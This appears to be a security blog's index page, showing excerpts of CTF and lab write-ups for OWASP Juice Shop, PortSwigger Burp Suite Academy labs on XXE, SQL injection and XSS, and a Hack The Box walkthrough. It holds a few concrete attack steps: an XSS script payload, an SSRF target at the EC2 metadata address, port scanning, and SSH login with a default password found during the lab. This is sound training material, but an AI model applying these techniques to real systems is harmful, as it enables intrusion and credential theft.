CTFs

OWASP Juicy Shop – Score Board Challenge

Some time ago we explained how to install the OWASP Juicy Shop. This first post of 2024 will explain how to start with this nice vulnerable application. The first step is finding the scoreboard. To find it, we observe several matches in the Javascript files using the browser inspector just searching for «score».Checking some of those matches we can find a promising option: /score-board If we test it: http://localhost:3000/#/score-board we

Burp Suite Academy: Exploiting XXE to perform SSRF attacksBurp Suite Academy

This lab has a «Check stock» feature that parses XML input and returns any unexpected values in the response. The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive. To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server’s IAM secret access

Burp Suite Academy: Exploiting XXE using external entities to retrieve filesBurp Suite Academy

This lab has a «Check stock» feature that parses XML input and returns any unexpected values in the response. To solve the lab, inject an XML external entity to retrieve the contents of the /etc/passwd file. Checking the request using Burp: Looking at the Port Swigger XML external entity (XXE) injection documentation we can learn a bit about this vulnerability. Send to Repeater and add the payload. The response will be:

Burp Suite Academy: SQL injection vulnerability allowing login bypassBurp Suite Academy

This lab contains a SQL injection vulnerability in the login function.To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user. Click on «My account»: We can see that the request is sent by POST. The value we add to the username field will be included in the request.We’ll use this field directly in the browser to add the payload. We can try the

Burp Suite Academy – SQL injection vulnerability in WHERE clause allowing retrieval of hidden dataBurp Suite Academy

This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following: SELECT * FROM products WHERE category = ‘Gifts’ AND released = 1 To solve the lab, perform a SQL injection attack that causes the application to display details of all products in any category, both released and unreleased. https://0aca0089049c37728097175e00b9006c.web-security-academy.net https://0aca0089049c37728097175e00b9006c.web-security-academy.net/filter?category=Accessories As the vulnerability is

Burp Suite Academy – DOM XSS in document.write sink using source location.search inside a select elementBurp Suite Academy

This lab contains a DOM-based cross-site scripting vulnerability in the stock checker functionality. It uses the JavaScript document.write function, which writes data out to the page. The document.write function is called with data from location.search which you can control using the website URL. The data is enclosed within a select element. To solve this lab, perform a cross-site scripting attack that breaks out of the select element and calls the alert function. Select any element: https://0a060014049d514780bc08700015003f.web-security-academy.net/product?productId=1 This script gets the param

Burp Suite Lab Academy – Reflected XSS into a JavaScript string with angle brackets HTML encodedBurp Suite Lab Academy

This lab contains a reflected cross-site scripting vulnerability in the search query tracking functionality where angle brackets are encoded. The reflection occurs inside a JavaScript string. To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the alert function. Access to the lab URL. According to the description, the vulnerability is located in the search functionality: Checking the inspector we can see that the URL running

Burp Suite Lab Academy – Stored XSS into anchor `href` attribute with double quotes HTML-encoded

This lab contains a stored cross-site scripting vulnerability in the comment functionality. To solve this lab, submit a comment that calls the alert function when the comment author name is clicked. Access to the lab: According to the description, the vulnerability is in the comment functionality. Now we can our comment in the source: Intercepting the request: Checking Burp Suite XSS documentation and based on the source code obtained after adding a new comment,

HTB Funnel

$ nmap -v -sV -p- 10.129.74.179 –min-rate 5000 $ ftp 10.129.74.179 Users detected: According to the password policy found, the default’s password is funnel123#!# $ ssh christine@10.129.74.179 Which service is running on TCP port 5432 and listens only on localhost? christine@funnel:~$ ss -tulpn Port 5432 is usually used by PostgreSQL As we don’t have access to the previously mentioned service from our local machine, we need to create a tunnel

Burp Suite Academy Lab – Reflected XSS into attribute with angle brackets HTML-encoded

This lab contains a reflected cross-site scripting vulnerability in the search blog functionality where angle brackets are HTML-encoded. To solve this lab, perform a cross-site scripting attack that injects an attribute and calls the alert function. «><script>alert(document.domain)</script> Checking BurpSuite Academy for Cross-Site Scripting, we find that if angle brackets are blocked or encoded, the input you won’t be able to break out of the tag in which it appears, so we can try other